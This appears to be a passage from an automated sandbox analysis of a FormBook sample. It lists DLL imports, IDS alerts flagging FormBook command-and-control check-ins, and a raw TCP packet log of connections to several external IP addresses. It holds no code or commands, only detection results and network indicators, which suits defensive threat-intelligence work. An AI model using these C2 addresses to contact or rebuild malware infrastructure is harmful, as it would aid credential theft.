                              OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishGreat Britain

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                              2024-08-30T09:20:30.057598+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975780192.168.2.585.159.66.93
                              2024-08-30T09:19:39.365441+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974580192.168.2.53.33.130.190
                              2024-08-30T09:17:48.609900+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314971880192.168.2.5154.23.184.240
                              2024-08-30T09:18:20.514483+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314972980192.168.2.5162.0.239.141
                              2024-08-30T09:19:34.266715+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974380192.168.2.53.33.130.190
                              2024-08-30T09:19:50.047575+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974780192.168.2.5218.247.68.184
                              2024-08-30T09:18:15.238657+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314972780192.168.2.5162.0.239.141
                              2024-08-30T09:18:28.752524+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314973180192.168.2.5199.59.243.226
                              2024-08-30T09:18:31.267914+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314973280192.168.2.5199.59.243.226
                              2024-08-30T09:19:20.766773+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314973980192.168.2.5161.97.168.245
                              2024-08-30T09:18:33.824371+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314973380192.168.2.5199.59.243.226
                              2024-08-30T09:17:39.801428+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314971680192.168.2.5199.59.243.226
                              2024-08-30T09:17:39.801428+0200TCP2856318ETPRO MALWARE FormBook CnC Checkin (POST) M414971680192.168.2.5199.59.243.226
                              2024-08-30T09:17:37.239570+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314971580192.168.2.5199.59.243.226
                              2024-08-30T09:20:24.986401+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975580192.168.2.585.159.66.93
                              2024-08-30T09:20:08.488774+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975380192.168.2.513.248.169.48
                              2024-08-30T09:19:23.357921+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974080192.168.2.5161.97.168.245
                              2024-08-30T09:18:56.175427+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314973780192.168.2.55.144.130.52
                              2024-08-30T09:20:03.372374+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975180192.168.2.513.248.169.48
                              2024-08-30T09:20:27.508042+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975680192.168.2.585.159.66.93
                              2024-08-30T09:19:25.970333+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974180192.168.2.5161.97.168.245
                              2024-08-30T09:19:52.600683+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974880192.168.2.5218.247.68.184
                              2024-08-30T09:17:34.711102+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314971480192.168.2.5199.59.243.226
                              2024-08-30T09:18:52.878591+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314973680192.168.2.55.144.130.52
                              2024-08-30T09:18:51.079658+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314973580192.168.2.55.144.130.52
                              2024-08-30T09:17:53.688591+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314972180192.168.2.5154.23.184.240
                              2024-08-30T09:17:51.162581+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314971980192.168.2.5154.23.184.240
                              2024-08-30T09:19:55.132399+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974980192.168.2.5218.247.68.184
                              2024-08-30T09:18:17.878924+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314972880192.168.2.5162.0.239.141
                              2024-08-30T09:19:36.788523+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974480192.168.2.53.33.130.190
                              2024-08-30T09:20:05.943803+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975280192.168.2.513.248.169.48

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Aug 30, 2024 09:17:18.498348951 CEST4971280192.168.2.545.33.23.183
                              Aug 30, 2024 09:17:18.503333092 CEST804971245.33.23.183192.168.2.5
                              Aug 30, 2024 09:17:18.503432989 CEST4971280192.168.2.545.33.23.183
                              Aug 30, 2024 09:17:18.511466026 CEST4971280192.168.2.545.33.23.183
                              Aug 30, 2024 09:17:18.516284943 CEST804971245.33.23.183192.168.2.5
                              Aug 30, 2024 09:17:19.018246889 CEST804971245.33.23.183192.168.2.5
                              Aug 30, 2024 09:17:19.018268108 CEST804971245.33.23.183192.168.2.5
                              Aug 30, 2024 09:17:19.018280983 CEST804971245.33.23.183192.168.2.5
                              Aug 30, 2024 09:17:19.018462896 CEST4971280192.168.2.545.33.23.183
                              Aug 30, 2024 09:17:19.018624067 CEST4971280192.168.2.545.33.23.183
                              Aug 30, 2024 09:17:19.022110939 CEST4971280192.168.2.545.33.23.183
                              Aug 30, 2024 09:17:19.026937008 CEST804971245.33.23.183192.168.2.5
                              Aug 30, 2024 09:17:34.226655006 CEST4971480192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:34.231532097 CEST8049714199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:34.231657028 CEST4971480192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:34.242311001 CEST4971480192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:34.247101068 CEST8049714199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:34.710808039 CEST8049714199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:34.710829973 CEST8049714199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:34.710841894 CEST8049714199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:34.711102009 CEST4971480192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:35.751529932 CEST4971480192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:36.770299911 CEST4971580192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:36.775228977 CEST8049715199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:36.775309086 CEST4971580192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:36.785790920 CEST4971580192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:36.790744066 CEST8049715199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:37.239430904 CEST8049715199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:37.239486933 CEST8049715199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:37.239500999 CEST8049715199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:37.239569902 CEST4971580192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:38.298845053 CEST4971580192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:39.316436052 CEST4971680192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:39.321396112 CEST8049716199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:39.321613073 CEST4971680192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:39.332509995 CEST4971680192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:39.337934971 CEST8049716199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:39.338223934 CEST8049716199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:39.801146984 CEST8049716199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:39.801165104 CEST8049716199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:39.801178932 CEST8049716199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:39.801428080 CEST4971680192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:40.845464945 CEST4971680192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:41.874427080 CEST4971780192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:41.882455111 CEST8049717199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:41.882560015 CEST4971780192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:41.891774893 CEST4971780192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:41.896676064 CEST8049717199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:42.375375032 CEST8049717199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:42.375399113 CEST8049717199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:42.375408888 CEST8049717199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:42.375660896 CEST4971780192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:42.378051043 CEST4971780192.168.2.5199.59.243.226
                              Aug 30, 2024 09:17:42.382817984 CEST8049717199.59.243.226192.168.2.5
                              Aug 30, 2024 09:17:47.692351103 CEST4971880192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:47.699186087 CEST8049718154.23.184.240192.168.2.5
                              Aug 30, 2024 09:17:47.699296951 CEST4971880192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:47.709398985 CEST4971880192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:47.714196920 CEST8049718154.23.184.240192.168.2.5
                              Aug 30, 2024 09:17:48.609348059 CEST8049718154.23.184.240192.168.2.5
                              Aug 30, 2024 09:17:48.609720945 CEST8049718154.23.184.240192.168.2.5
                              Aug 30, 2024 09:17:48.609899998 CEST4971880192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:49.220597029 CEST4971880192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:50.238960981 CEST4971980192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:50.243881941 CEST8049719154.23.184.240192.168.2.5
                              Aug 30, 2024 09:17:50.244075060 CEST4971980192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:50.254865885 CEST4971980192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:50.259838104 CEST8049719154.23.184.240192.168.2.5
                              Aug 30, 2024 09:17:51.162482023 CEST8049719154.23.184.240192.168.2.5
                              Aug 30, 2024 09:17:51.162513971 CEST8049719154.23.184.240192.168.2.5
                              Aug 30, 2024 09:17:51.162580967 CEST4971980192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:51.767118931 CEST4971980192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:52.785362959 CEST4972180192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:52.790335894 CEST8049721154.23.184.240192.168.2.5
                              Aug 30, 2024 09:17:52.790534019 CEST4972180192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:52.801175117 CEST4972180192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:52.806063890 CEST8049721154.23.184.240192.168.2.5
                              Aug 30, 2024 09:17:52.806166887 CEST8049721154.23.184.240192.168.2.5
                              Aug 30, 2024 09:17:53.688385010 CEST8049721154.23.184.240192.168.2.5
                              Aug 30, 2024 09:17:53.688402891 CEST8049721154.23.184.240192.168.2.5
                              Aug 30, 2024 09:17:53.688591003 CEST4972180192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:54.314162970 CEST4972180192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:55.332622051 CEST4972280192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:55.337516069 CEST8049722154.23.184.240192.168.2.5
                              Aug 30, 2024 09:17:55.337609053 CEST4972280192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:55.344477892 CEST4972280192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:55.351763964 CEST8049722154.23.184.240192.168.2.5
                              Aug 30, 2024 09:17:56.252789974 CEST8049722154.23.184.240192.168.2.5
                              Aug 30, 2024 09:17:56.253173113 CEST8049722154.23.184.240192.168.2.5
                              Aug 30, 2024 09:17:56.253233910 CEST4972280192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:56.255445957 CEST4972280192.168.2.5154.23.184.240
                              Aug 30, 2024 09:17:56.260221958 CEST8049722154.23.184.240192.168.2.5
                              Aug 30, 2024 09:18:14.635456085 CEST4972780192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:14.640353918 CEST8049727162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:14.640428066 CEST4972780192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:14.653378010 CEST4972780192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:14.658318043 CEST8049727162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:15.238581896 CEST8049727162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:15.238603115 CEST8049727162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:15.238615990 CEST8049727162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:15.238656998 CEST4972780192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:15.238678932 CEST8049727162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:15.238689899 CEST8049727162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:15.238701105 CEST8049727162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:15.238713026 CEST8049727162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:15.238719940 CEST4972780192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:15.238727093 CEST8049727162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:15.238738060 CEST8049727162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:15.238738060 CEST4972780192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:15.238749027 CEST8049727162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:15.238785982 CEST4972780192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:15.238800049 CEST4972780192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:15.243633986 CEST8049727162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:15.243647099 CEST8049727162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:15.243658066 CEST8049727162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:15.243685961 CEST4972780192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:15.300318956 CEST4972780192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:15.325977087 CEST8049727162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:15.325998068 CEST8049727162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:15.326016903 CEST8049727162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:15.326134920 CEST8049727162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:15.332326889 CEST4972780192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:16.160350084 CEST4972780192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:17.275650978 CEST4972880192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:17.280611992 CEST8049728162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:17.280730963 CEST4972880192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:17.292551994 CEST4972880192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:17.297441006 CEST8049728162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:17.878793955 CEST8049728162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:17.878818035 CEST8049728162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:17.878827095 CEST8049728162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:17.878839970 CEST8049728162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:17.878851891 CEST8049728162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:17.878923893 CEST4972880192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:17.879004955 CEST4972880192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:17.879388094 CEST8049728162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:17.879400015 CEST8049728162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:17.879416943 CEST8049728162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:17.879429102 CEST8049728162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:17.879439116 CEST8049728162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:17.879470110 CEST4972880192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:17.879487991 CEST4972880192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:17.883825064 CEST8049728162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:17.883838892 CEST8049728162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:17.883850098 CEST8049728162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:17.883996010 CEST4972880192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:17.923261881 CEST4972880192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:17.969461918 CEST8049728162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:17.969480991 CEST8049728162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:17.969494104 CEST8049728162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:17.969597101 CEST8049728162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:17.969628096 CEST4972880192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:17.972460985 CEST4972880192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:18.798396111 CEST4972880192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:19.896106005 CEST4972980192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:19.901535034 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:19.904469013 CEST4972980192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:19.943846941 CEST4972980192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:19.948748112 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:19.948801041 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:20.514219046 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:20.514249086 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:20.514261007 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:20.514275074 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:20.514286995 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:20.514297962 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:20.514311075 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:20.514322042 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:20.514333963 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:20.514345884 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:20.514482975 CEST4972980192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:20.514482975 CEST4972980192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:20.519443989 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:20.519481897 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:20.519490957 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:20.519627094 CEST4972980192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:20.563895941 CEST4972980192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:20.604826927 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:20.604849100 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:20.604871035 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:20.604882956 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:20.604924917 CEST4972980192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:20.604953051 CEST4972980192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:20.605093956 CEST8049729162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:20.605159044 CEST4972980192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:21.454591990 CEST4972980192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:22.476306915 CEST4973080192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:22.481230021 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:22.481559038 CEST4973080192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:22.489532948 CEST4973080192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:22.495601892 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.105999947 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.106020927 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.106033087 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.106039047 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.106045008 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.106050014 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.106056929 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.106060982 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.106072903 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.106081963 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.106189013 CEST4973080192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:23.106264114 CEST4973080192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:23.107877970 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.111850023 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.111860991 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.111872911 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.111977100 CEST4973080192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:23.111977100 CEST4973080192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:23.173506021 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.173552036 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.173563957 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.173578978 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.173656940 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:23.173677921 CEST4973080192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:23.173717976 CEST4973080192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:23.178090096 CEST4973080192.168.2.5162.0.239.141
                              Aug 30, 2024 09:18:23.183005095 CEST8049730162.0.239.141192.168.2.5
                              Aug 30, 2024 09:18:28.257565022 CEST4973180192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:28.262396097 CEST8049731199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:28.264240026 CEST4973180192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:28.273420095 CEST4973180192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:28.278230906 CEST8049731199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:28.752444983 CEST8049731199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:28.752469063 CEST8049731199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:28.752489090 CEST8049731199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:28.752523899 CEST4973180192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:28.752612114 CEST4973180192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:29.784188032 CEST4973180192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:30.801431894 CEST4973280192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:30.806324959 CEST8049732199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:30.806400061 CEST4973280192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:30.817337036 CEST4973280192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:30.822171926 CEST8049732199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:31.267853022 CEST8049732199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:31.267877102 CEST8049732199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:31.267890930 CEST8049732199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:31.267914057 CEST4973280192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:31.267940998 CEST4973280192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:32.329622984 CEST4973280192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:33.352158070 CEST4973380192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:33.357439041 CEST8049733199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:33.357661009 CEST4973380192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:33.370430946 CEST4973380192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:33.375380993 CEST8049733199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:33.375418901 CEST8049733199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:33.818547964 CEST8049733199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:33.818640947 CEST8049733199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:33.818654060 CEST8049733199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:33.824371099 CEST4973380192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:34.876997948 CEST4973380192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:35.895602942 CEST4973480192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:35.900876045 CEST8049734199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:35.901009083 CEST4973480192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:35.908360958 CEST4973480192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:35.916357040 CEST8049734199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:36.363014936 CEST8049734199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:36.363042116 CEST8049734199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:36.363053083 CEST8049734199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:36.363064051 CEST8049734199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:36.363168001 CEST4973480192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:36.368354082 CEST4973480192.168.2.5199.59.243.226
                              Aug 30, 2024 09:18:36.373245955 CEST8049734199.59.243.226192.168.2.5
                              Aug 30, 2024 09:18:49.548398972 CEST4973580192.168.2.55.144.130.52
                              Aug 30, 2024 09:18:49.554023027 CEST80497355.144.130.52192.168.2.5
                              Aug 30, 2024 09:18:49.554344893 CEST4973580192.168.2.55.144.130.52
                              Aug 30, 2024 09:18:49.565850973 CEST4973580192.168.2.55.144.130.52
                              Aug 30, 2024 09:18:49.570739985 CEST80497355.144.130.52192.168.2.5
                              Aug 30, 2024 09:18:51.079658031 CEST4973580192.168.2.55.144.130.52
                              Aug 30, 2024 09:18:51.128571987 CEST80497355.144.130.52192.168.2.5
                              Aug 30, 2024 09:18:52.098402977 CEST4973680192.168.2.55.144.130.52
                              Aug 30, 2024 09:18:52.103343964 CEST80497365.144.130.52192.168.2.5
                              Aug 30, 2024 09:18:52.103517056 CEST4973680192.168.2.55.144.130.52
                              Aug 30, 2024 09:18:52.115134954 CEST4973680192.168.2.55.144.130.52
                              Aug 30, 2024 09:18:52.119987965 CEST80497365.144.130.52192.168.2.5
                              Aug 30, 2024 09:18:52.878087044 CEST80497365.144.130.52192.168.2.5
                              Aug 30, 2024 09:18:52.878539085 CEST80497365.144.130.52192.168.2.5
                              Aug 30, 2024 09:18:52.878591061 CEST4973680192.168.2.55.144.130.52
                              Aug 30, 2024 09:18:53.626539946 CEST4973680192.168.2.55.144.130.52
                              Aug 30, 2024 09:18:54.646909952 CEST4973780192.168.2.55.144.130.52
                              Aug 30, 2024 09:18:54.653044939 CEST80497375.144.130.52192.168.2.5
                              Aug 30, 2024 09:18:54.653115034 CEST4973780192.168.2.55.144.130.52
                              Aug 30, 2024 09:18:54.668154001 CEST4973780192.168.2.55.144.130.52
                              Aug 30, 2024 09:18:54.673053980 CEST80497375.144.130.52192.168.2.5
                              Aug 30, 2024 09:18:54.673281908 CEST80497375.144.130.52192.168.2.5
                              Aug 30, 2024 09:18:56.175426960 CEST4973780192.168.2.55.144.130.52
                              Aug 30, 2024 09:18:56.227942944 CEST80497375.144.130.52192.168.2.5
                              Aug 30, 2024 09:18:57.192909002 CEST4973880192.168.2.55.144.130.52
